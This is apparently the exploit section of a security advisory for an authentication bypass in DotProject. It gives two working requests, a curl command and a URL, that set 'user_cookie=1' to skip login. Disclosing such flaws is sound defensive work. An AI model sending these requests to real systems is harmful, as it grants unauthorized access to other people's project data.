DotProject User Cookie Authentication Bypass Vulnerability

info
discussion
exploit
solution
references

DotProject User Cookie Authentication Bypass Vulnerability

This issue may be exploited with a web browser. The following examples were submitted:

curl -b user_cookie=1 http://server/project/index.php?m=projects

or

http://server/project/index.php?m=projects&user_cookie=1